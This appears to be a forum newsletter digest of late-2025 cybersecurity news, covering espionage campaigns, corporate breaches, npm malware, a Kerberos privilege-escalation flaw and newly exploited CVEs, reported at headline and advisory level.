Arctic Wolf Labs has identified an active cyber espionage campaign by Chinese-affiliated threat actor UNC6384 targeting European diplomatic entities in Hungary, Belgium, and additional European nations during September and October 2025. The campaign represents a tactical evolution incorporating the exploitation of ZDI-CAN-25373, a Windows shortcut vulnerability disclosed in March 2025, alongside refined social engineering leveraging authentic diplomatic conference themes.
The attack chain begins with spearphishing emails containing an embedded URL that is the first of several stages that lead to the delivery of malicious LNK files themed around European Commission meetings, NATO-related workshops, and multilateral diplomatic coordination events. These files exploit the recently disclosed Windows vulnerability to execute obfuscated PowerShell commands that extract and deploy a multi-stage malware chain, culminating in PlugX remote access trojan (RAT) deployment through DLL side-loading of legitimate signed Canon printer assistant utilities.
Major US Telecom Backbone Firm Hacked by Nation-State Actors
Ribbon provides communications and networking solutions that enable organizations to reliably run phone calls and data networks.
The firm says its solutions are used by service providers, enterprises and critical infrastructure organizations. Its website lists BT, Verizon, Deutsche Telekom, CenturyLink, TalkTalk, Softbank, and Tata as its customers, along with the US Department of Defense and the City of Los Angeles.
In a quarterly financial report submitted recently to the SEC, Ribbon said it discovered unauthorized access to its IT network in early September 2025.
An investigation showed that the hackers may have gained initial access as early as December 2024, but the probe is still ongoing.
Ribbon has not shared any technical details on the incident, but said a nation-state threat actor is believed to be behind the attack.
The ruling, issued Friday by Phyllis J. Hamilton of the US District Court of the District of Northern California, grants a permanent injunction sought by WhatsApp owner Meta in a case it brought against NSO in 2019. The lawsuit alleged that Meta caught NSO trying to surreptitiously infect about 1,400 mobile phones—many belonging to attorneys, journalists, human-rights activists, political dissidents, diplomats, and senior foreign government officials—with Pegasus. As part of the campaign, NSO created fake WhatsApp accounts and targeted Meta infrastructure. The suit sought monetary awards and an injunction against the practice.
Kerberos authentication reflection can be abused for remote privilege escalation, even after applying the fix for CVE-2025-33073.
Ghost SPNs (Service Principal Names mapped to hostnames that fail to resolve) introduce an exploitable attack surface that adversaries can leverage.
Default Active Directory (AD) settings allow standard users to register DNS records, enabling this attack, which Microsoft has cataloged as CVE-2025-58726 (SMB Server Elevation of Privilege).
Failure to enforce SMB signing is a critical enabler. The attack works on all Windows versions unless SMB signing is required.
Microsoft addressed this issue in the October 2025 Patch Tuesday.
Kerberos is widely used for secure authentication in Windows environments. However, when misconfigured Service Principal Names (SPNs) and default permissions align, attackers can exploit Kerberos reflection to gain SYSTEM-level access remotely.
We reported these findings to the Microsoft Security Response Center (MSRC) in June 2025. Microsoft released a security update for the issue, cataloged as CVE-2025-58726, in October 2025. Understanding how attackers exploit gaps in SPN and authentication security can help prevent similar vulnerabilities.
The incident was disclosed publicly in late January, when Conduent confirmed system disruptions that affected government agencies in multiple US states.
In April, the company notified the Securities and Exchange Commission (SEC) that the attackers had stolen personal information from its systems.
Last week, Conduent started notifying users that their personal information was stolen in the incident, and submitted notices to Attorney General’s Offices in multiple states.
The hackers accessed Conduent’s network on October 21, 2024 and were evicted on January 13, 2025, after the attack was identified, the company says in the notification letter to the affected individuals.
During that time, the attackers exfiltrated various files, including names, addresses, dates of birth, Social Security numbers, health insurance details, and medical information.
Conduent is not providing the affected people with free identity theft protection services, but encourages them to obtain free credit reports, place fraud alerts on their credit files, and place security freezes on their credit reports.
EY exposes 4TB+ SQL database to open internet for who knows how long
A Dutch cybersecurity outfit says its lead researcher recently stumbled upon a 4TB+ SQL Server backup file belonging to EY exposed to the web, effectively leaking the accounting and consulting megacorp's secrets.
Among the BAK file's data were API keys, cached authentication tokens, session tokens, service account passwords, and user credentials, Neo Security's writeup explained.
"Finding a 4TB SQL backup exposed to the public internet is like finding the master blueprint and the physical keys to a vault, just sitting there," it said. "[The lead researcher had] investigated breaches that started with less. Way less. He once traced an entire ransomware incident back to a single web.config file that leaked a connection string. That was 8 kilobytes. This was four terabytes."
The researcher, who was not named in the company's report, downloaded the first thousand bytes of the file and found that the BAK file was also unencrypted.
It became exposed via a classic cloud bucket misconfiguration. Neo Security said the case was reminiscent of a similar breach it saw years ago when investigating a ransomware case.
PhantomRaven: NPM Malware Hidden in Invisible Dependencies
126 malicious npm packages. Over 86,000 downloads. Actively stealing npm tokens, GitHub credentials, and CI/CD secrets from developers worldwide - all while hiding the malicious code in dependencies hidden from the dependency analysis that most security tools rely on.
They're calling this campaign PhantomRaven.
Packages making external network requests during installation - all to the same suspicious domain - were discovered in October 2025. Sequential email accounts (jpdtester01@hotmail[.]com → jpdtester13@gmail[.]com) and predictable usernames indicated a single operator controlling the campaign.
Malicious code was hidden in invisible dependencies that get fetched at install time. The packages themselves often appeared harmless, e.g., a simple hello world script.
CVE-2025-61932: A vulnerability in LANSCOPE Endpoint Manager on-premises (Client program MR and Detection Agent DA) where improper verification of the origin of incoming requests allows remote code execution via specially crafted packets.
CVE-2025-54236: A flaw in Adobe Commerce / Magento Open Source (dubbed “SessionReaper”) involving improper input validation of the REST API, enabling unauthenticated session takeover and potentially remote code execution.
CVE-2025-59287: A critical remote code execution vulnerability in Windows Server Update Services (WSUS) caused by unsafe deserialization of untrusted data in the AuthorizationCookie or ReportingWebService, allowing unauthenticated attackers to execute code with SYSTEM privileges.
Writer - [mention=5465469]
183 million email passwords exposed in massive data leak including millions of Gmail accounts
Security researcher Troy Hunt of HaveIBeenPwned reports a 3.5 TB credential dump including over 183 million unique entries, of which about 16.4 million had not appeared in any prior breach. The leak is attributed to infostealer malware and affects Gmail, Yahoo, Outlook and more. Source
Microsoft issues out of band update to mitigate critical WSUS vulnerability under active exploitation
Cybersecurity and Infrastructure Security Agency (CISA) alerts organizations to apply the October 23, 2025 patch for a WSUS remote code execution vulnerability (CVE-2025-59287) now exploited in the wild. Source
Auto sector cyber risk surges as manufacturing disruption becomes strategic target
A recent study shows the automobile industry faces historic cyber threats, with the Jaguar Land Rover breach cited as a major warning. Supply chain disruption, factory shutdowns and cascading vendor impacts highlight the systemic danger. Source
U.S. government data hub targeted, breach hits FEMA & CBP via Citrix exploit
A breach of Federal Emergency Management Agency (FEMA) Region 6 network and U.S. Customs and Border Protection (CBP) employee data stemmed from a Citrix NetScaler Gateway memory disclosure bug (CVE-2025-5777). The incident underscores the ongoing vulnerability of federal systems. Source
Exploit chain shift, IT and OT convergence and Zero Trust urgency dominate breach summaries for October 2025
Cyber attack reports from Xage indicate that the boundary between IT and OT environments is collapsing, with double the rate of nationally significant incidents in the UK compared to 2024. The shift signals mounting demand for proactive Zero Trust models. Source
![[Image: vyres-gray.png]](https://hackforums.net/images/hfnews/vyres-gray.png)
![[Image: headlines-red.png]](https://hackforums.net/images/hfnews/headlines-red.png)
![[Image: statistics-magenta.png]](https://hackforums.net/images/hfnews/statistics-magenta.png)
![[Image: ed438103df717964215398ec256d46cc.png]](https://i.gyazo.com/ed438103df717964215398ec256d46cc.png)
![[Image: f2845361d9a10e92c6bbf84da2f582ca.png]](https://i.gyazo.com/f2845361d9a10e92c6bbf84da2f582ca.png)
![[Image: awards-yellow.png]](https://hackforums.net/images/hfnews/awards-yellow.png)
![[Image: notable.png]](https://hackforums.net/images/hfnews/notable.png)
![[Image: groups-yellow.png]](https://hackforums.net/images/hfnews/groups-yellow.png)
![[Image: music-header.png]](https://hackforums.net/images/hfnews/music-header.png)
![[Image: spec-ops.png]](https://hackforums.net/images/hfnews/spec-ops.png)
![[Image: contests.png]](https://hackforums.net/images/hfnews/contests.png)
![[Image: 74affadcc69e708053e67cf55c2ee961.png]](https://i.gyazo.com/74affadcc69e708053e67cf55c2ee961.png)
![[Image: tech-brown.png]](https://hackforums.net/images/hfnews/tech-brown.png)
![[Image: fkHQSuV.png]](https://i.imgur.com/fkHQSuV.png)
![[Image: 3-gray.png]](https://hackforums.net/images/hfnews/3-gray.png)
![[Image: 9a79c2d2a7fd917ecd01253077491640.png]](https://i.gyazo.com/9a79c2d2a7fd917ecd01253077491640.png)
![[Image: user-gray.png]](https://hackforums.net/images/hfnews/user-gray.png)
